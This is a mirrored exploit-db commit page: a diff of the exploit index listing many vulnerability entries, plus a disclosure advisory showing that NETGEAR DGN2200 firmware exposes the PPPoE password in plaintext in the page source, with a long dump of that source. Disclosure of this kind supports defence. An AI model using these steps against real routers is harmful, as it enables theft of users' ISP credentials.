bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_26_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-26 04:37:24 +00:00
parent 8041bf2c96
commit 0cca3dcc6f
12 changed files with 1927 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -17504,7 +17504,7 @@ id,file,description,date,author,platform,type,port
20201,platforms/linux/local/20201.c,"Nvidia Linux Driver Privilege Escalation",2012-08-02,anonymous,linux,local,0
20202,platforms/windows/remote/20202.rb,"Cisco Linksys PlayerPT ActiveX Control SetSource sURL argument Buffer Overflow",2012-08-03,metasploit,windows,remote,0
20204,platforms/windows/remote/20204.rb,"Dell SonicWALL Scrutinizer 9 SQL Injection",2012-08-03,metasploit,windows,remote,0
20205,platforms/unix/remote/20205.rb,"Zenoss 3 showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
20205,platforms/unix/remote/20205.rb,"Zenoss 3 - showDaemonXMLConfig Command Execution",2012-08-03,metasploit,unix,remote,8080
20206,platforms/multiple/remote/20206.txt,"QSSL Voyager 2.0 1B Arbitrary File Access",2000-09-01,neonbunny,multiple,remote,0
20207,platforms/multiple/remote/20207.txt,"QSSL Voyager 2.0 1B .photon Directory Information Disclosure",2000-09-01,neonbunny,multiple,remote,0
20208,platforms/php/webapps/20208.txt,"nathan purciful phpphotoalbum 0.9.9 - Directory Traversal vulnerability",2000-09-07,pestilence,php,webapps,0
@ -30190,7 +30190,7 @@ id,file,description,date,author,platform,type,port
33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0
33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0
33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
@ -30209,7 +30209,7 @@ id,file,description,date,author,platform,type,port
33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0
33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0
33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0
33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21
33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0
33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0
@ -30756,8 +30756,19 @@ id,file,description,date,author,platform,type,port
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
34149,platforms/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure vulnerability",2014-07-23,"Dolev Farhi",hardware,webapps,0
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0
34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0
34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0
34154,platforms/php/webapps/34154.txt,"Software Index 'signinform.php' Cross-Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
34155,platforms/php/webapps/34155.txt,"Ceica-GW 'login.php' Cross Site Scripting Vulnerability",2010-06-27,indoushka,php,webapps,0
34156,platforms/windows/remote/34156.pl,"TurboFTP Server <= 1.20.745 Directory Traversal Vulnerability",2010-06-17,leinakesi,windows,remote,0
34157,platforms/php/webapps/34157.txt,"Firebook Multiple Cross Site Scripting and Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service Vulnerability",2010-06-17,"Luigi Auriemma",windows,dos,0
34159,platforms/php/webapps/34159.txt,"Gallery XML Joomla! Component 1.1 SQL Injection and Local File Include Vulnerabilities",2010-06-18,jdc,php,webapps,0
34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution Exploit",2014-07-24,LiquidWorm,php,remote,80
34161,platforms/php/webapps/34161.txt,"Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 64bit - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0

Can't render this file because it is too large.

827
platforms/hardware/webapps/34149.txt Executable file
View file

@ -0,0 +1,827 @@
# Exploit Title: Password Disclosure vulnerability
# Software: NETGEAR DGN2200
# Software Link: netgear.com
# Version: DGN2200
# Author: Dolev Farhi, email: dolev(at)openflare(dot)org
# Date: 23.7.2014
# Tested on: Kali Linux
# Firmware 1.0.0.29_1.7.29_HotS
2. Vulnerability Description:
===============================
An attacker is able to extract sensitive information such as the password from the Basic Settings router page due to storing it in plaintext.
3. Steps to reproduce:
======================
Navigate to the Basic Settings page, right click in the browser -> view source/frame
html>
<head>
<META name="description" content="DGN2200v2BEZEQ">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<META http-equiv="Content-Style-Type" content="text/css">
<META http-equiv="Pragma" content="no-cache">
<META HTTP-equiv="Cache-Control" content="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="Mon, 06 Jan 1990 00:00:01 GMT">
<title>PPPoE</title>
<link rel="stylesheet" href="form.css">
<STYLE TYPE="text/javascript">
classes.num.all.fontFamily = "Courier";
classes.num.all.fontSize = "10pt" ;
</style>
<script language="javascript" type="text/javascript" src="func.js"></script>
<script language="javascript" type="text/javascript" src="msg.js"></script>
<script language="javascript" type="text/javascript" src="utility.js"></script>
<script language="javascript" type="text/javascript" src="browser.js"></script>
<script language="javascript" type="text/javascript" src="md5.js"></script>
<script language="javascript" type="text/javascript">
var DisableFixedIP = false;
var DisableFixedDNS = false;
var all_wan_proto = new Array(8);
var all_pppoe_localip = new Array(8);
var all_wan_dns_sel = new Array(8);
var all_wan_dns1_pri = new Array(8);
var all_wan_dns1_sec = new Array(8);
var all_wan_nat = new Array(8);
var all_wan_fw = new Array(8);
var all_ppp_dod = new Array(8);
var all_pppoe_idletime = new Array(8);
var all_pppoe_username = new Array(8);
var all_pppoe_passwd = new Array(8);
var all_pppoe_servicename = new Array(8);
var all_is_static_ip = new Array(8);
var all_wan_isbridge = new Array(8);
function loadMultiWanInfo()
{
var cf = document.forms[0];
cf.adslChoice.selectedIndex = cf.nowchoice.value;
all_wan_proto[0] = "pppoe";
all_wan_proto[1] = "pppoe";
all_wan_proto[2] = "pppoe";
all_wan_proto[3] = "pppoe";
all_wan_proto[4] = "pppoe";
all_wan_proto[5] = "pppoe";
all_wan_proto[6] = "pppoe";
all_wan_proto[7] = "pppoe";
all_pppoe_localip[0] = "ip.add.re.ss";
all_pppoe_localip[1] = "0.0.0.0";
all_pppoe_localip[2] = "0.0.0.0";
all_pppoe_localip[3] = "0.0.0.0";
all_pppoe_localip[4] = "0.0.0.0";
all_pppoe_localip[5] = "0.0.0.0";
all_pppoe_localip[6] = "0.0.0.0";
all_pppoe_localip[7] = "0.0.0.0";
all_ppp_dod[0] = 0;
all_ppp_dod[1] = 0;
all_ppp_dod[2] = 0;
all_ppp_dod[3] = 0;
all_ppp_dod[4] = 0;
all_ppp_dod[5] = 0;
all_ppp_dod[6] = 0;
all_ppp_dod[7] = 0;
all_pppoe_idletime[0] = 0 / 60;
all_pppoe_idletime[1] = 0 / 60;
all_pppoe_idletime[2] = 0 / 60;
all_pppoe_idletime[3] = 0 / 60;
all_pppoe_idletime[4] = 0 / 60;
all_pppoe_idletime[5] = 0 / 60;
all_pppoe_idletime[6] = 0 / 60;
all_pppoe_idletime[7] = 0 / 60;
all_wan_dns_sel[0] = "0";
all_wan_dns_sel[1] = "0";
all_wan_dns_sel[2] = "0";
all_wan_dns_sel[3] = "0";
all_wan_dns_sel[4] = "0";
all_wan_dns_sel[5] = "0";
all_wan_dns_sel[6] = "0";
all_wan_dns_sel[7] = "0";
all_wan_dns1_pri[0] = "80.179.52.100";
all_wan_dns1_pri[1] = "";
all_wan_dns1_pri[2] = "";
all_wan_dns1_pri[3] = "";
all_wan_dns1_pri[4] = "";
all_wan_dns1_pri[5] = "";
all_wan_dns1_pri[6] = "";
all_wan_dns1_pri[7] = "";
all_wan_dns1_sec[0] = "80.179.55.100";
all_wan_dns1_sec[1] = "";
all_wan_dns1_sec[2] = "";
all_wan_dns1_sec[3] = "";
all_wan_dns1_sec[4] = "";
all_wan_dns1_sec[5] = "";
all_wan_dns1_sec[6] = "";
all_wan_dns1_sec[7] = "";
all_wan_nat[0] = "1";
all_wan_nat[1] = "1";
all_wan_nat[2] = "1";
all_wan_nat[3] = "1";
all_wan_nat[4] = "1";
all_wan_nat[5] = "1";
all_wan_nat[6] = "1";
all_wan_nat[7] = "1";
all_wan_fw[0] = "1";
all_wan_fw[1] = "1";
all_wan_fw[2] = "1";
all_wan_fw[3] = "1";
all_wan_fw[4] = "1";
all_wan_fw[5] = "1";
all_wan_fw[6] = "1";
all_wan_fw[7] = "1";
all_pppoe_username[0] = "user@012ISP";
all_pppoe_username[1] = "";
all_pppoe_username[2] = "";
all_pppoe_username[3] = "";
all_pppoe_username[4] = "";
all_pppoe_username[5] = "";
all_pppoe_username[6] = "";
all_pppoe_username[7] = "";
all_pppoe_passwd[0] = "MyPassword"; <--- password
all_pppoe_passwd[1] = "";
all_pppoe_passwd[2] = "";
all_pppoe_passwd[3] = "";
all_pppoe_passwd[4] = "";
all_pppoe_passwd[5] = "";
all_pppoe_passwd[6] = "";
all_pppoe_passwd[7] = "";
all_pppoe_servicename[0] = "";
all_pppoe_servicename[1] = "";
all_pppoe_servicename[2] = "";
all_pppoe_servicename[3] = "";
all_pppoe_servicename[4] = "";
all_pppoe_servicename[5] = "";
all_pppoe_servicename[6] = "";
all_pppoe_servicename[7] = "";
all_is_static_ip[0] = "0";
all_is_static_ip[1] = "0";
all_is_static_ip[2] = "0";
all_is_static_ip[3] = "0";
all_is_static_ip[4] = "0";
all_is_static_ip[5] = "0";
all_is_static_ip[6] = "0";
all_is_static_ip[7] = "0";
all_wan_isbridge[0] = "0";
all_wan_isbridge[1] = "0";
all_wan_isbridge[2] = "0";
all_wan_isbridge[3] = "0";
all_wan_isbridge[4] = "0";
all_wan_isbridge[5] = "0";
all_wan_isbridge[6] = "0";
all_wan_isbridge[7] = "0";
}
function goTestApply()
{
var winoptions = "width=640,height=480,menubar=yes,toolbar=yes,status=yes,location=yes,resizable=yes";
if(document.forms[0].runtest.value == "yes")
openDataSubWin('wtest.htm',winoptions);
}
function ChangeAdslChoice()
{
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
var wan_proto = all_wan_proto[index];
if (wan_proto == "dhcp" || wan_proto == "ipoa"
|| wan_proto == "mer" || wan_proto == "static" )
doTypeChange2(0);
else if (wan_proto == "pppoe")
doTypeChange2(1);
else
doTypeChange2(2);
// loadSettings(index);
// loadcheck();
}
function doTypeChange2(newIndex)
{
var tmpstr;
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
if (newIndex == 0)
{
tmpstr = "ether_m.cgi?nowchoice=" + index + "&nowproto=0";
location.href = tmpstr;
}
else if (newIndex == 1)
{
tmpstr = "pppoe_m.cgi?nowchoice=" + index+ "&nowproto=1";
location.href = tmpstr;
}
else if (newIndex == 2)
{
tmpstr = "pppoa_m.cgi?nowchoice=" + index+ "&nowproto=1";
location.href = tmpstr;
}
}
function doTypeChange3(newIndex)
{
var tmpstr;
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
var mux = cf.dsl_multiplex.value;
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
var msg = "";
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
if (msg.length > 1)
{
alert(msg);
return false;
}
if (newIndex == 0)
{
tmpstr="ether_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
else if (newIndex == 1)
{
tmpstr="pppoe_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
}
function setServer()
{
var cf = document.forms[0];
var stype = cf.login_type.selectedIndex;
var tmpstr;
var index = cf.adslChoice.selectedIndex;
var mux = cf.dsl_multiplex.value;
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
var msg = "";
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
if (msg.length > 1)
{
alert(msg);
return false;
}
if(stype==0) //pppoe
{
tmpstr="pppoe_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
else if(stype==1) //pppoa
{
tmpstr="pppoa_m.cgi?nowchoice="+index+"&havetmpvar=1&gui_mode=1&tmpmux="+mux+"&tmpvpi="+vpi+"&tmpvci="+vci;
location.href = tmpstr;
}
}
function loadcheck()
{
var cf = document.forms[0];
if (isIE())
{
cf.pppoe_username.size="24";
cf.pppoe_passwd.size="24";
}
loadhelp('BAS_mpppoe');
setIP();
setDNS();
}
function setIP()
{
var cf = document.forms[0];
var dflag = cf.WANAssign[0].checked;
setDisabled(dflag,cf.WPethr1,cf.WPethr2,cf.WPethr3,cf.WPethr4);
if (cf.WANAssign[1].checked)
{
cf.DNSAssign[1].checked = true;
setDNS();
}
DisableFixedIP = dflag;
}
function setDNS()
{
var cf = document.forms[0];
var dflag = cf.DNSAssign[0].checked;
if (cf.WANAssign[1].checked && cf.DNSAssign[0].checked)
{
cf.DNSAssign[1].checked=true;
dflag = false;
}
setDisabled(dflag,cf.DAddr1,cf.DAddr2,cf.DAddr3,cf.DAddr4,cf.PDAddr1,cf.PDAddr2,cf.PDAddr3,cf.PDAddr4);
DisableFixedDNS = dflag;
}
function checkData()
{
var cf = document.forms[0];
var msg = "";
var vpi = cf.dsl_vpi.value;
var vci = cf.dsl_vci.value;
if( isNumeric(cf.dsl_vpi, 255) )
msg = "VPI contains an invalid number"
if( isNumeric(cf.dsl_vci, 65536) )
msg = "VC contains an invalid number"
if (vpi < 0 || vpi > 255)
msg = "VPI is out of range [0~255]"
if (vci < 32 || vci > 65535)
msg = "VC is out of range [32~65535]"
msg+= checkBlank(cf.pppoe_username, "User name");
if(cf.pppoe_idletime.value.length<=0)
msg+= "Please enter idle time.\n";
else if(!_isNumeric(cf.pppoe_idletime.value))
msg+= "Invalid idle time,please enter proper numeral.\n";
if(cf.WANAssign[1].checked)
{
if(checkIP(cf.WPethr1,cf.WPethr2,cf.WPethr3,cf.WPethr4,254)||(parseInt(cf.WPethr4.value)==0))
msg+= "Invalid static IP address.\n";
cf.pppoe_localip.value = cf.WPethr1.value+'.'+cf.WPethr2.value+'.'+cf.WPethr3.value+'.'+cf.WPethr4.value;
}
else
cf.pppoe_localip.value = "0.0.0.0";
if(cf.DNSAssign[1].checked)
{
if(checkIP(cf.DAddr1,cf.DAddr2,cf.DAddr3,cf.DAddr4,254)||(parseInt(cf.DAddr4.value)==0))
msg+= "Invalid Primary DNS Address, please enter again.\n";
if(cf.PDAddr1.value.length>0)
if(checkIP(cf.PDAddr1,cf.PDAddr2,cf.PDAddr3,cf.PDAddr4,254)||(parseInt(cf.PDAddr4.value)==0))
msg+= "Invalid Secondary DNS Address, please enter again.\n";
}
if (duplicatepvcChk(vpi,vci))
msg += "duplicate PVC found!\n";
if (msg.length > 1)
{
alert(msg);
return false;
}
cf.wan_dns1_pri.value = cf.DAddr1.value+'.'+cf.DAddr2.value+'.'+cf.DAddr3.value+'.'+cf.DAddr4.value;
cf.wan_dns1_sec.value = cf.PDAddr1.value+'.'+cf.PDAddr2.value+'.'+cf.PDAddr3.value+'.'+cf.PDAddr4.value;
cf.nowchoice.value = -1;
return true;
}
function duplicatepvcChk(vpi, vci)
{
var cf = document.forms[0];
var index = cf.adslChoice.selectedIndex;
if (( index != 0) && (vpi == cf.atm0_vpi.value) && (vci == cf.atm0_vci.value) && (cf.wan0_dial.value == "1"))
return true;
if ((index != 1) && (vpi == cf.atm1_vpi.value) && (vci == cf.atm1_vci.value) && (cf.wan1_dial.value == "1"))
return true;
if ((index != 2) && (vpi == cf.atm2_vpi.value) && (vci == cf.atm2_vci.value) && (cf.wan2_dial.value == "1"))
return true;
if ((index != 3) && (vpi == cf.atm3_vpi.value) && (vci == cf.atm3_vci.value) && (cf.wan3_dial.value == "1"))
return true;
if ((index != 4) && (vpi == cf.atm4_vpi.value) && (vci == cf.atm4_vci.value) && (cf.wan4_dial.value == "1"))
return true;
if ((index != 5) && (vpi == cf.atm5_vpi.value) && (vci == cf.atm5_vci.value) && (cf.wan5_dial.value == "1"))
return true;
if ((index != 6) && (vpi == cf.atm6_vpi.value) && (vci == cf.atm6_vci.value) && (cf.wan6_dial.value == "1"))
return true;
if ((index != 7) && (vpi == cf.atm7_vpi.value) && (vci == cf.atm7_vci.value) && (cf.wan7_dial.value == "1"))
return true;
return false;
}
function resetPvc()
{
window.location.href="BAS_mpppoe.htm";
}
function loadSettings(index)
{
var cf = document.forms[0];
var pppoe_localip;
var wan_dns1_pri;
var wan_dns1_sec;
var tmp;
var wan_proto;
var dod;
if (index == 100)
index = eval(cf.nowchoice.value);
loadvpivci(index);
wan_proto = all_wan_proto[index];
if (all_pppoe_localip[index].length!=0)
{
pppoe_localip=all_pppoe_localip[index].split(".");
cf.WPethr1.value = pppoe_localip[0];
cf.WPethr2.value = pppoe_localip[1];
cf.WPethr3.value = pppoe_localip[2];
cf.WPethr4.value = pppoe_localip[3];
}
var wan_dns_sel = all_wan_dns_sel[index];
if ( all_wan_dns1_pri[index].length!=0 )
{
wan_dns1_pri = all_wan_dns1_pri[index].split(".");
cf.DAddr1.value = wan_dns1_pri[0];
cf.DAddr2.value = wan_dns1_pri[1];
cf.DAddr3.value = wan_dns1_pri[2];
cf.DAddr4.value = wan_dns1_pri[3];
}
if ( all_wan_dns1_sec[index].length!=0 )
{
wan_dns1_sec = all_wan_dns1_sec[index].split(".");
cf.PDAddr1.value = wan_dns1_sec[0];
cf.PDAddr2.value = wan_dns1_sec[1];
cf.PDAddr3.value = wan_dns1_sec[2];
cf.PDAddr4.value = wan_dns1_sec[3];
}
cf.pppoe_idletime.value = all_pppoe_idletime[index];
if (all_ppp_dod[index] == 2)
cf.pppoe_idletime.disabled = true;
else
cf.pppoe_idletime.disabled = false;
//if (all_pppoe_localip[index]=="0.0.0.0")
// cf.WANAssign[0].checked = true;
//else
// cf.WANAssign[1].checked = true;
if (all_is_static_ip[index] == 1)//static ip
cf.WANAssign[1].checked = true;
else
cf.WANAssign[0].checked = true;
cf.DNSAssign[wan_dns_sel].checked = true;
if (all_wan_isbridge[index] == 1)
cf.nat_enable[2].checked = true;
else if (all_wan_nat[index] == 1)
cf.nat_enable[0].checked = true;
else
cf.nat_enable[1].checked = true;
cf.pppoe_username.value = all_pppoe_username[index];
cf.pppoe_passwd.value = all_pppoe_passwd[index];
cf.pppoe_servicename.value = all_pppoe_servicename[index];
//water
setIP();
setDNS();
}
function loadvpivci(index)
{
var cf = document.forms[0];
var multiplex;
var vpi;
var vci;
switch(index)
{
case 0:
vpi=cf.atm0_vpi.value;
vci=cf.atm0_vci.value;
multiplex=cf.atm0_encap.value;
break;
case 1:
vpi=cf.atm1_vpi.value;
vci=cf.atm1_vci.value;
multiplex=cf.atm1_encap.value;
break;
case 2:
vpi=cf.atm2_vpi.value;
vci=cf.atm2_vci.value;
multiplex=cf.atm2_encap.value;
break;
case 3:
vpi=cf.atm3_vpi.value;
vci=cf.atm3_vci.value;
multiplex=cf.atm3_encap.value;
break;
case 4:
vpi=cf.atm4_vpi.value;
vci=cf.atm4_vci.value;
multiplex=cf.atm4_encap.value;
break;
case 5:
vpi=cf.atm5_vpi.value;
vci=cf.atm5_vci.value;
multiplex=cf.atm5_encap.value;
break;
case 6:
vpi=cf.atm6_vpi.value;
vci=cf.atm6_vci.value;
multiplex=cf.atm6_encap.value;
break;
case 7:
vpi=cf.atm7_vpi.value;
vci=cf.atm7_vci.value;
multiplex=cf.atm7_encap.value;
break;
}
var tmpvarhave = "";
var tmpmux = "";
var tmpvpi = "";
var tmpvci = "";
if (tmpvarhave == 1)
{
if (multiplex != tmpmux)
cf.cfgChanged.value='1';
if (vpi != tmpvpi)
cf.cfgChanged.value='1';
if (vci != tmpvci)
cf.cfgChanged.value='1';
multiplex = tmpmux;
vpi = tmpvpi;
vci = tmpvci;
}
if (multiplex == "LLC")
cf.dsl_multiplex.selectedIndex = 0;
else
cf.dsl_multiplex.selectedIndex = 1;
cf.dsl_vpi.value=vpi;
cf.dsl_vci.value=vci;
}
function setCfgChanged()
{
var cf = document.forms[0];
cf.cfgChanged.value='1';
}
function checkTest()
{
var cf = document.forms[0];
var ret = checkData();
var winoptions = "width=640,height=480,menubar=yes,toolbar=yes,status=yes,location=yes,resizable=yes";
//var winoptions = "width=400,height=360,status=yes,resizable=yes";
if ( ret == true)
{
if (cf.cfgChanged.value=='0')
{
//openDataSubWin('wtest.htm',winoptions);
//cf.nowchoice.value = 100;
//checkData();
//document.formname.submit();
var tmpstr = "pppoe_m.cgi?nowchoice=100" + "&nowproto=0";
location.href = tmpstr;
//return true;
}
else
{
cf.testpressed.value = '1';
cf.nowchoice.value = -1;
document.formname.submit();
}
}
}
</script>
</head>
<body bgcolor="#ffffff" onload="loadMultiWanInfo();loadSettings(100);loadcheck();goTestApply();">
<form name="formname" method="POST" action="pppoe_m.cgi">
<table border="0" cellpadding="0" cellspacing="3" width="99%">
<tr>
<td colspan="2"><h1>Basic Settings</h1></td>
</tr>
<tr>
<td colspan="2">
<select name="adslChoice" onChange="ChangeAdslChoice();" size="1">
<option value=0>WAN1</option>
</select>
</td>
</tr>
<!-- RULE
<tr>
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td nowrap width="50%">Multiplexing Method</TD>
<td width="50%" align="right">
<SELECT name="dsl_multiplex" size="1">
<option value="LLC">LLC-BASED</option>
<option value="VC">VC-BASED</option>
</SELECT></TD>
</TR>
<TR>
<td nowrap width="50%">VPI</td>
<td nowrap width="50%" align="right"><input type="text" class="num" name="dsl_vpi" size="3" maxlength="3"></td>
</tr>
<TR>
<td nowrap width="50%">VCI</td>
<td nowrap width="50%" align="right"><input type="text" class="num" name="dsl_vci" size="5" maxlength="5"></td>
</tr>
-->
<INPUT name=dsl_multiplex type=hidden value= "">
<INPUT name=dsl_vpi type=hidden value= "">
<INPUT name=dsl_vci type=hidden value= "">
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2">
<p><a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1"><b>Does Your Internet Connection Require A Login?</b></a></p></td>
</tr>
<tr>
<td colspan="2"><input type="radio" checked name="loginreq" value="pppoe" onClick="doTypeChange3(1);">
<a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1">Yes</a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="loginreq" value="dhcp" onClick="doTypeChange3(0);">
<a href="javascript:loadhelp('BAS_mpppoe','question')" tabindex="-1">No</a></td>
</tr>
<tr>
<td width="50%"><a href="javascript:loadhelp('BAS_mpppoe','isp')" tabindex="-1"><b>Encapsulation</b></a></td>
<td width="50%" align="right"><select name="login_type" onChange="setServer()"><option>PPPoE (PPP over Ethernet)</option><!-- temp marked by Silver <option>PPPoA (PPP over ATM)</option>--></select></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
<tr>
<td><a href="javascript:loadhelp('BAS_mpppoe','login')" tabindex="-1"><b>Login</b></a></td>
<td align="right"><input type="text" name="pppoe_username" size="15" maxlength="60" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td><a href="javascript:loadhelp('BAS_mpppoe','password')" tabindex="-1"><b>Password</b></a></td>
<td align="right"><input type="password" name="pppoe_passwd" size="15" maxlength="50" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td nowrap><a href="javascript:loadhelp('BAS_mpppoe','serv_name')" tabindex="-1"><b>Service Name</b></a> (If Required) </td>
<td align="right"><input type="text" name="pppoe_servicename" maxlength="63" size="15" value="" onChange="setCfgChanged()"></td>
</tr>
<tr>
<td nowrap><a href="javascript:loadhelp('BAS_mpppoe','idletime')" tabindex="-1"><b>Idle Timeout</b></a> (In Minutes)</td>
<td align="right"><input type="text" class="num" name="pppoe_idletime" size="3" maxlength="3" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','InternetIP')" tabindex="-1"><b>Internet IP Address</b></a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="WANAssign" value="Dynamic" onClick="setIP()" onChange="setCfgChanged()">Get Dynamically From ISP</td>
</tr>
<tr>
<td nowrap><input type="radio" name="WANAssign" value="Fixed" onClick="setIP()" onChange="setCfgChanged()">Use Static IP Address</td>
<td align="right" class="num">
<input type="text" name="WPethr1" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr2" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr3" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()">.
<input type="text" name="WPethr4" class="num" size="4" maxlength="3" onFocus="if(DisableFixedIP) this.blur()" onChange="setCfgChanged()"></td>
</tr>
<tr> <!-- RULE -->
<td colspan="2" background="liteblue.gif" height="12"> </td>
</tr>
<tr>
<td colspan="2"><a href="javascript:loadhelp('BAS_mpppoe','DNSaddress')" tabindex="-1"><b>Domain Name Server (DNS) Address </b></a></td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="DNSAssign" value="0" onClick="setDNS()" onChange="setCfgChanged()"> Get Automatically From ISP</td>
</tr>
<tr>
<td colspan="2"><input type="radio" name="DNSAssign" value="1" onClick="setDNS()" onChange="setCfgChanged()"> Use These DNS Servers</td>
</tr>
<tr>
